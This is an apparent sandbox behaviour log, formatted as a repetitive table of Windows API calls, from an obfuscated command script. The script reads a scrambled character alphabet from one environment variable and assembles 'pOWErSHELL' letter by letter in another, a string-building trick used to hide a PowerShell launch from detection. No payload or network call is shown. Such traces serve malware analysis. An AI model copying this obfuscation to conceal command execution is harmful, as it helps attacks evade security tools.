1 | |
| Environment | Get Environment String | name = begw, result_out = r$Oq\a+N,=^oWR&;1TSXs{u""[fQ:K4.7e)-6'pV5zMkCDIxL(yGn8A]UJhmt2B0blP9YwEjgcH3iv}Fd |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 2 |
|
1 | |
| Environment | Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 26 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 3 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 25 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 4 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 3 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 10 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 7 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 17 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 2 |
|
1 | |
| Environment | Get Environment String | name = tGCX, result_out = !tGCX!pOW |
|
1 | |
| Environment | Get Environment String | name = begw, result_out = r$Oq\a+N,=^oWR&;1TSXs{u""[fQ:K4.7e)-6'pV5zMkCDIxL(yGn8A]UJhmt2B0blP9YwEjgcH3iv}Fd |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 2 |
|
1 | |
| Environment | Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 26 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 3 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 24 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 4 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 3 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 9 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 7 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 17 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 2 |
|
1 | |
| Environment | Get Environment String | name = tGCX, result_out = !tGCX!pOWE |
|
1 | |
| Environment | Get Environment String | name = begw, result_out = r$Oq\a+N,=^oWR&;1TSXs{u""[fQ:K4.7e)-6'pV5zMkCDIxL(yGn8A]UJhmt2B0blP9YwEjgcH3iv}Fd |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 2 |
|
1 | |
| Environment | Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 26 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 3 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 25 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 4 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 3 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 10 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 7 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 17 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 2 |
|
1 | |
| Environment | Get Environment String | name = tGCX, result_out = !tGCX!pOWEr |
|
1 | |
| Environment | Get Environment String | name = begw, result_out = r$Oq\a+N,=^oWR&;1TSXs{u""[fQ:K4.7e)-6'pV5zMkCDIxL(yGn8A]UJhmt2B0blP9YwEjgcH3iv}Fd |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 2 |
|
1 | |
| Environment | Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 26 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 3 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 25 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 4 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 3 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 10 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 7 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 17 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 2 |
|
1 | |
| Environment | Get Environment String | name = tGCX, result_out = !tGCX!pOWErS |
|
1 | |
| Environment | Get Environment String | name = begw, result_out = r$Oq\a+N,=^oWR&;1TSXs{u""[fQ:K4.7e)-6'pV5zMkCDIxL(yGn8A]UJhmt2B0blP9YwEjgcH3iv}Fd |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 2 |
|
1 | |
| Environment | Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 26 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 3 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 25 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 4 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 3 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 10 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 7 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 17 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 2 |
|
1 | |
| Environment | Get Environment String | name = tGCX, result_out = !tGCX!pOWErSH |
|
1 | |
| Environment | Get Environment String | name = begw, result_out = r$Oq\a+N,=^oWR&;1TSXs{u""[fQ:K4.7e)-6'pV5zMkCDIxL(yGn8A]UJhmt2B0blP9YwEjgcH3iv}Fd |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 2 |
|
1 | |
| Environment | Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 26 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 3 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 25 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 4 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 3 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 10 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 7 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 17 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 2 |
|
1 | |
| Environment | Get Environment String | name = tGCX, result_out = !tGCX!pOWErSHE |
|
1 | |
| Environment | Get Environment String | name = begw, result_out = r$Oq\a+N,=^oWR&;1TSXs{u""[fQ:K4.7e)-6'pV5zMkCDIxL(yGn8A]UJhmt2B0blP9YwEjgcH3iv}Fd |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 2 |
|
1 | |
| Environment | Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 26 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 3 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 25 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 4 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 3 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 10 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 7 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 17 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 2 |
|
1 | |
| Environment | Get Environment String | name = tGCX, result_out = !tGCX!pOWErSHEL |
|
1 | |
| Environment | Get Environment String | name = begw, result_out = r$Oq\a+N,=^oWR&;1TSXs{u""[fQ:K4.7e)-6'pV5zMkCDIxL(yGn8A]UJhmt2B0blP9YwEjgcH3iv}Fd |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 2 |
|
1 | |
| Environment | Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 26 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 3 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 25 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 4 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 3 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 10 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 7 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 17 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 2 |
|
1 | |
| Environment | Get Environment String | name = tGCX, result_out = !tGCX!pOWErSHELL |
|
1 | |
| Environment | Get Environment String | name = begw, result_out = r$Oq\a+N,=^oWR&;1TSXs{u""[fQ:K4.7e)-6'pV5zMkCDIxL(yGn8A]UJhmt2B0blP9YwEjgcH3iv}Fd |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 2 |
|
1 | |
| Environment | Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 26 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 3 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 25 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 4 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 3 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 10 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 7 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 17 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 2 |
|
1 | |
| Environment | Get Environment String | name = tGCX, result_out = !tGCX!pOWErSHELL |
|
1 | |
| Environment | Get Environment String | name = begw, result_out = r$Oq\a+N,=^oWR&;1TSXs{u""[fQ:K4.7e)-6'pV5zMkCDIxL(yGn8A]UJhmt2B0blP9YwEjgcH3iv}Fd |
|
1 | |
